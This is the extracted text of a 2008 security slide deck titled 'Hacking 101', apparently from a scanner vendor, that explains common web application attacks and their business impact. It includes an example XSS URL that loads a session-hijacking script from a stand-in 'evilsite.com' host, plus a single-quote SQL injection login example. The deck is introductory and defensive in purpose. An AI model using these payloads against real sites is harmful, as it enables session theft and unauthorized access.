Beruflich Dokumente
Kultur Dokumente
Hacking 101
January 22, 2008
Security Landscape
Objective
● Understand the web application environment
● Understand and differentiate between network and application level vulnerabilities
● Understand where the vulnerabilities exist
Web Backend
Firewall
Application Server
Databases
Web Servers
We Have Firewalls
in Place We Audit It Once a
Quarter with Pen Testers
We Use Network
Vulnerability Scanners
% of Attacks % of Dollars
Web 10%
Applications
75% 90%
Network
Server
25%
Authentication ● Brute Force Attacks that target a web site’s method of validating the
● Insufficient Authentication identity of a user, service or application.
Authorization ● Credential/Session Prediction Attacks that target a web site’s method of determining if a
● Insufficient Authorization user, service or application has the necessary permissions
to perform a requested action.
● Insufficient Session Expiration
● Session Fixation
Client-side Attacks ● Content Spoofing The abuse or exploitation of a web site’s users (breaching
● Cross Site Scripting trust relationships between a user and a web site).
Command Execution ● Buffer Overflow Attacks designed to execute remote commands on the web
● Format String Attack site by manipulating user-supplied input fields.
● LDAP Injection
● OS Commanding
● SQL Injection
● SSI Injection
● XPath Injection
Information Disclosure ● Directory Indexing Attacks designed to acquire system specific information
● Information Leakage about a web site. This includes software distribution, version
numbers, patch levels, and also secure file locations.
● Path Traversal
● Predictable Resource Location
Logical Attacks ● Abuse of Functionality The abuse or exploitation of a web application logic flow
● Denial of Service (password recovery, account registration, auction bidding
and eCommerce purchasing are examples of application
● Insufficient Anti-automation logic).
● Insufficient Process Validation
Parameter Tampering
● What is it?
Parameters are used to obtain information from the client.
This information can be changed in a site’s URL parameter
● Why does parameter tampering exist?
Developers focus on the legal values of parameters and how they should be utilized.
Little if any attention is given to the incorrect values
● Business Impact
The application can perform a function that was not intended by its developer like giving
access to customer information.
Parameter Tampering
Brute Force
● What is it?
Automated process of trial and error methods used to guess a persons username, password,
credit-card number or cryptographic keys. Also called Parameter Tampering.
● Why do Brute Force attacks exist?
Weak passwords and encryption techniques
Easy to guess, dictionary based
No account lockout
Site doesn’t lockout a user after 3 invalid login attempts
● Business Impact
It may be possible to escalate user privileges and gain administrative permissions over the
web application
Confidential information disclosure
Financial risk
Directory Indexing
● What is it?
It is possible to view and download the contents of certain web application virtual directories,
which may contain restricted files.
● Why do Insufficient Authentication attacks exist?
Web-based administration tools
‘Hidden’, not linked to main site (easier to setup, but a danger if the admin site is URL
accessible)
‘/admin’ directory off of the root
● Business Impact
Attacker can view confidential files
Attacker can construct a targeted attack plan for your site
Directory navigation to restricted areas of the site
Credential/Session Prediction
● What is it?
A method of hijacking or impersonating a web site user
Also called Cookie Poisoning
● Why do Credential/Session Prediction attacks exist?
Session IDs stored as cookies, hidden-fields or URL values
An attacker will try to determine the algorithm used to generate the ID and try to impersonate
the current user or the next session ID
● Business Impact
User impersonation
Fraudulent access and use of a user’s (or many user’s) information/account/confidential
details
http://www.altoromutual.com/altoro/search.aspx?txtSearch=%3Cscript+src%3D%22http%3A%2F%2Fwww.e
vilsite.com%2Fxss%2Fhijack.js%22%3E%3C%2Fscript%3E
Bad Guy
SQL Injection
● What is it?
An attacker injects malicious characters (SQL syntax) into web application parameters in an
attempt to change the original syntax of the query.
● Why does SQL Injection exist?
Sanitization of hazardous characters was not performed correctly on user input.
● Business Impact
It is possible to view, modify or delete database entries and tables.
It is possible to alter the original query in order to bypass normal authentication mechanisms.
SQL Injection
Username: jsmith
Password: demo1234
Username: ‘
Password: a
Need password to bypass
client-side validation.
Automated Tools
Q&A
Questions?
Resources
● Download AppScan 7.6 - http://www.watchfire.com
● Latest whitepapers visit: http://www.watchfire.com/news/whitepapers.aspx
● Visit Watchfire at one of our upcoming shows
http://www.watchfire.com/news/events.aspx
● Register for upcoming web seminars visit
http://www.watchfire.com/news/seminars.aspx
● Contact us at sales@watchfire.com